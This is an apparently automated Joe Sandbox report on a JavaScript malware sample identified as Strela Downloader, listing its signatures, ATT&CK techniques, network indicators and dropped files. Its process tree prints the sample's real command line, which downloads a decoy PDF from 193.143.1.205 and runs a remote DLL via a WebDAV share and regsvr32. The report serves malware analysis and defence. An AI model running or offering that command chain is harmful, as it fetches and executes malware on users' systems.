Windows
Analysis Report
61969293196726215.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 3712 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\61969 2931967262 15.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 1004 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \960222852 31319.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 920 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 1260 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 6300 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7388 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=22 20 --field -trial-han dle=1684,i ,444869932 8047466074 ,901001444 8242658297 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7180 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588119 |
Start date and time: | 2025-01-10 21:33:05 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 61969293196726215.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@28/62@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 199.232.210.172, 2.16.168.107, 2.16.168.105, 23.40.179.72, 23.40.179.71, 23.40.179.15, 23.40.179.19, 23.40.179.35, 23.40.179.29, 23.40.179.22, 192.168.2.7, 13.107.246.45, 34.237.241.83, 172.202.163.200, 23.195.92.153
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 61969293196726215.js
Time | Type | Description |
---|---|---|
15:34:03 | API Interceptor | |
15:34:07 | API Interceptor | |
15:34:07 | API Interceptor | |
15:34:14 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7067056960562164 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq1:2JIB/wUKUKQncEmYRTwh0h |
MD5: | FFDCA82FF9D10DBAD226DBC7829C6636 |
SHA1: | BE60F0765852E82D220E160ADFE0CA20925AC967 |
SHA-256: | EDB90A4B7A9C81968BB49834EF5882933D47D3F996CB1795C1296AADCB7058E2 |
SHA-512: | 30EF43A3C04497ADBD9FA0FFD43CF69C4EAE66831EA25765B79205FBA6ADDA0F70981486F4CE2F3AB97F5593F9EBA7710F9E4087CAD2CCD055585A6CF783EF2B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7900002490167877 |
Encrypted: | false |
SSDEEP: | 1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii |
MD5: | A59C560E3FD7639D870B2BA7CE009541 |
SHA1: | 2B6617E0F082A7067D157995E670C51EC93FE416 |
SHA-256: | 94ED4ED4083260B525E417475A6204A7856564F10408849178D4A813E93CB50B |
SHA-512: | 505A880DEC5005E4A30B0095311F5F46D96AD26697F2E96DCD58450074CCFD2635E685D328AAEA0536BB04ACFDFC4C27B02C4B39AF33286CA30B1BEC7D6BEED6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08214642395097635 |
Encrypted: | false |
